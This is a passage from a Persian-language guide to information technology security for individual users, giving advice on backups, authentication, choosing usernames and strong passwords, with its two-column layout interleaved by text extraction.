‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻓﻮﺍﺻـﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ‪.‬‬
‫ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؟ ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﻃـﻮﻻﻧﻲ‬
‫ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﺯﺣﻤﺖ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﻧﻤـﻲﺩﻫﻨـﺪ ﻭ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﺯ ﺭﺩﻩ ﺧـﺎﺭﺝ ﺷـﺪﻥ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻋﻮﺍﻗﺐ ﺍﻳﻨﻜﺎﺭ ﺧﻮﺩ ﮔﺮﻓﺘـﺎﺭ ﺷـﻮﻧﺪ‪ .‬ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ‬
‫ﺭﺳﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﺩﺍﺩﻩﺍﻱ ﺩﺭ ﻳﻚ‬
‫ﻋﻤﻮﻣﹰﺎ ﻭﻗﺘﻲ ﻫﻢ ﻛﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﻣﻲﺷﻮﻧﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨـﺪ‬
‫ﻓﻼﭘﻲ ﭘﻨﺞ ﺍﻳﻨﭽﻲ ﻛﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۰‬ﺭﺍﻳﺞ ﺑـﻮﺩﻩ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ‬
‫ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻫﻤﭽﻨﺎﻥ ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳـﺖ‬
‫ﺑﺎﺷﺪ ﺁﻳﺎ ﺍﻣﺮﻭﺯ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﭘـﻨﺞ ﺍﻳﻨﭽـﻲ‬
‫ﻛﻪ ﺍﺯ ﻣﺨﺎﻃﺮﺓ ﺍﺣﺘﻤﺎﻟﻲ ﭘﻴﺸﮕﻴﺮﻱ ﻛﻨﻴﺪ ﻭ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ‬
‫ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺁﻥ ﭘﻴﺪﺍ ﻛﺮﺩ؟‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﭼﻨﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ؟‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻫﻔﺘﻪ ﺍﻱ ﻳﻜﺒﺎﺭ ﺍﺯ ﺁﻧﭽـﻪ ﺩﺍﺭﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‬
‫‪٢٣‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﺑﺪﺍﻧـﺪ‬ ‫ﺩﺭﺻﻮﺭﺕ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻓﺎﺟﻌﺔ ﻣﺼﻴﺒﺖﺑﺎﺭ‪ ،‬ﺣﺪﺍﻛﺜﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ .‬ﺍﻳﻦ ﺩﺍﻧﺎﻳﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﺯ‬ ‫ﻳﻚ ﻫﻔﺘـﻪ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺧﻮﺍﻫﻴـﺪ ﺩﺍﺩ‪ .‬ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ‬
‫ﻻ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ‬ ‫ﺗﻘﻠﺐ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻭﻟﻲ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻓﻀﺎﻱ ﺍﺷﻐﺎﻝﺷﺪﻩ‬
‫ﻋﺒﻮﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻳﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﮔﻮﻧـﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻳـﻦ‬ ‫ﺑﻮﺳﻴﻠﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﻣـﻲﺷـﻮﺩ‪ .‬ﭼـﻪ ﺗﻌـﺪﺍﺩ ﺍﺯ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟـﻪ ﺍﻳـﻦ ﺍﺳـﺖ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺪ ﻧﮕﻪ ﺩﺍﺷﺖ؟ ﺍﮔﺮ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﻳﺎ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﻛﻠﻤﺎﺗﻲ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ‬ ‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﻟﻴﻠﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺨﻮﺍﻫﻴـﺪ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺳﺮﻳﻊ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪ ،‬ﭼﻮﻥ ﺣﺠﻢ ﻛﻤـﻲ ﺩﺍﺭﻧـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ‬
‫‪23‬‬ ‫‪Authentication‬‬
‫‪٦١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻻ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭼﻨﻴﻦ ﻧﻤـﺎﺩﻱ ﺍﺯ‬


‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ‬ ‫ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﺣﺘﻲ ﺣﺪﺱ ﺯﺩ ﺗﺎ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨـﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﻛﻠﻤﺎﺕ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﻴﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺑﺎﺷﺪ ﻭ ﺷﺨﺺ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﻣﺮﺗﺒﹰﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ‬
‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺎ ﺍﻧﺘﺨﺎﺏ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ‬ ‫•‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺗﻤﺎﺱ ﺑﺎﺷﻴﺪ ﻗﺎﻋﺪﺗﹰﺎ ﺗﺎ ﻛﻨﻮﻥ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻧﮕﻪ ﺩﺍﺭﻳﺪ؟ ﺍﮔﺮ ﺑﻮﺳﻴﻠﺔ ﺍﻳﻦ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩﺍﻳـﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺮ‬
‫ﺩﺭ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﮔﺮﻭﻫﻲ ﺷﺮﻛﺖ ﻣﻲﻛﻨﻴﺪ )ﻣﺜ ﹰ‬
‫ﻼ ﻳـﻚ ﺑـﺎﺯﻱ‬
‫ﺭﻭﻱ ﻳﻚ ﻛﺎﻏﺬ ﻧﺰﺩﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﺯ ﺍﻣﻨﻴﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺷﺎﻳﺪ ﻧﺨﻮﺍﻫﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺭﺍ‬
‫ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺑﺪﺍﻧﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺎﻣﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﺁﺳﺎﻥ‬ ‫•‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ‬
‫ﺑﺎﺷﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻳﻚ ﺧﺪﻣﺖ ﺑﺮﺧﻂ‪ ٢٤‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛـﻪ‬
‫ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﻛـﻪ‬
‫ﺑﻪ ﻧﺪﺭﺕ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻣﻲ ﮔﻴﺮﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺣﺮﺍﺯ ﻛﻨﻨﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ‬
‫ﺍﺳﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﺩﺭ ﺫﻫﻦ ﺑﻤﺎﻧـﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷـﻮﺩ‪ :‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺷـﻤﺎﺭﺓ‬
‫ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻋﻀﻮﻳﺖ‪ ،‬ﺍﺳﻢ ﻋﻀﻮ ﻭ‪...‬؛ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺒﺎﺣـﺚ ﻋﻤﻮﻣـﹰﺎ ﺍﺯ ﻧـﺎﻡ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺁﻥ ﺧـﺪﻣﺎﺕ ﺑـﺎ ﻧﻜﺘـﺔ ﻣﻬـﻢ ﻭ‬
‫ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑﺠـﺎﻱ ﻧـﺎﻡ‬
‫ﺣﺴﺎﺳﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺒﺎﺷﻨﺪ‪.‬‬
‫ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﺷــﻮﺩ‪ .‬ﺩﺭ‬
‫ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺣﺪﺱ ﺯﺩﻥ ﻧﺎﻣﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺑـﺮﺍﻱ‬ ‫•‬ ‫ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺩﻳﮕﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ؟ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺷـﻤﺎ‬ ‫ﻧﻤﺎﺩﻱ ﺧﺎﺹ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻠﻘﻲ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺩﺭ ﺧـﺼﻮﺹ ﻧـﺎﻡ‬
‫ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻌﻴﻴﻦ ﺷﻮﺩ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺭﺍﺣﺘـﻲ‬ ‫ﻛﺎﺭﺑﺮﻱ ﻗﻮﺍﻧﻴﻦ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪:‬‬
‫ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﻨﺪ )ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺑﺎﻳـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻃﻮﻝ ﺍﺳﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨـﺪ ﻭﻟـﻲ‬ ‫•‬
‫ﭼﻨﺪﻻﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻋﻤﻮﻣﻲ ﺧﻮﺩ‬
‫ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﺣـﺪﺱﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ‬ ‫ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻗﺎﺋﻞ ﻧﻤﻲﺷﻮﻧﺪ‪.‬‬
‫ﺳﺎﺭﻗﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ(‪.‬‬ ‫ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻫـﺮ ﻋﻼﻣﺘـﻲ ‪ -‬ﻛـﻪ‬ ‫•‬
‫ﺑﻮﺳﻴﻠﺔ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﺑﺎﺷﺪ ‪ -‬ﺩﺭ ﺗﺮﻛﻴﺐ ﻧـﺎﻡ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‬ ‫ﻛــﺎﺭﺑﺮﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩ‪ ،‬ﻭﻟــﻲ ﺑﻌــﻀﻲ ﺩﻳﮕــﺮ ﻓﻘــﻂ ﺩﺭ‬
‫ﺩﺭ ﺑﻌــﻀﻲ ﺳﻴــﺴﺘﻤﻬﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺳــﻮﻱ ﺳﻴــﺴﺘﻢ ﺗﻌﻴــﻴﻦ‬ ‫ﻣﺤﺪﻭﺩﺓ ﺣـﺮﻭﻑ ﻭ ﺍﻋـﺪﺍﺩ ﻭ ﻓﻘـﻂ ﺍﻧـﺪﻛﻲ ﺩﺭ ﻣﺤـﺪﻭﺩﺓ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻠﻤﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻫﺮ ﺻﻮﺭﺕ ﺗﻮﺳﻂ‬ ‫ﻋﻼﺋﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮ ﺗﻌﻴﻴﻦ ﻣﻲﮔﺮﺩﺩ ﻭ ﺷﻜﻞ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ‬ ‫ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺣـﺮﻭﻑ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﺭﺍ ﻳﻜـﺴﺎﻥ‬ ‫•‬
‫ﺣﺪﺱ ﺯﺩﻧﺶ ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺩﻳﮕﺮ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪.‬‬ ‫ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ ﻭﻟﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﻪ ﻣﻨﺰﻟـﺔ ﺩﻭ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺫﺧﻴـﺮﻩ ﻣـﻲﺷـﻮﻧﺪ‬ ‫ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻻ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﻛﺴﻲ ﺑﻪ ﺩﻳﺴﻚ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﻣﻌﻤﻮ ﹰ‬ ‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺘﺨﺎﺏ ﻧﺪﻫـﺪ‪ ،‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﺷـﻤﺎ‬
‫ﭘﻴﺪﺍ ﻛﺮﺩ ﻗﺎﺩﺭ ﺑﻪ ﻣﺸﺎﻫﺪﺓ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‬ ‫ﻫﻤﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺳﻴﺴﺘﻢ ﺗﻌﻴﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺍﮔﺮ‬
‫ﺍﻳﻦ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺭﻣﺰﻫـﺎﻱ‬ ‫ﻻﺯﻡ ﺑﺎﺷﺪ ﺧﻮﺩﺗﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﭼﻪ ﻧﻜـﺎﺗﻲ ﺭﺍ ﺑﺎﻳـﺪ‬
‫ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﺴﻮﻳﻪ‪ ٢٥‬ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺩﺭ‬ ‫ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﻗﺘﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﺍ ﻭﺍﺭﺩ‬
‫ﺁﻳﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ‬ ‫•‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺎ ﻧﺴﺨﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ‬
‫ﺷﻤﺎ ﺑﺎﺷﺪ؟ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳـﺖ ﺍﻳـﻦ ﺍﺳـﻢ ﻛﻤـﻚ ﻛﻨـﺪ ﻛـﻪ‬
‫ﺩﻭﺳﺘﺎﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧﺘﺎﻥ ﺷـﻤﺎ ﺭﺍ ﺑـﺸﻨﺎﺳﻨﺪ؟ ﻳـﻚ ﺁﺩﺭﺱ‬
‫‪24‬‬ ‫‪Online Service‬‬
‫‪25‬‬ ‫‪One-way Encryption‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٦٢‬‬

‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻋـﺪﺍﺩ ﺗﺮﻛﻴﺒـﻲ‪ ،‬ﻋﻼﻣﺘﻬـﺎﻱ ﻣﺠـﺎﺯ ﻭ‬ ‫•‬ ‫ﺩﺭ ﺩﻳﺴﻚ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﺩ )ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺿﻤﻴﻤﺔ ‪ ۱‬ﻫﻤﻴﻦ‬
‫ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬ ‫ﺑﺨﺶ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(‪.‬‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻓـﻀﺎﻱ ﺧـﺎﻟﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫•‬
‫ﻗﺎﻧﻮﻥ ﺳﻮﻡ‪:‬‬
‫ﻛﻨﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺑـﻪ ﺷـﻜﻞ ﻳـﻚ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ‬
‫ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧـﺮﺍ ﺑﺮﺍﺣﺘـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﺻﻠﻪﻫﺎ ﺭﺍ ﺣـﺬﻑ‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺁﻭﺭﺩ‪ ،‬ﻭﻟﻲ ﺣﺪﺱ ﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ‬
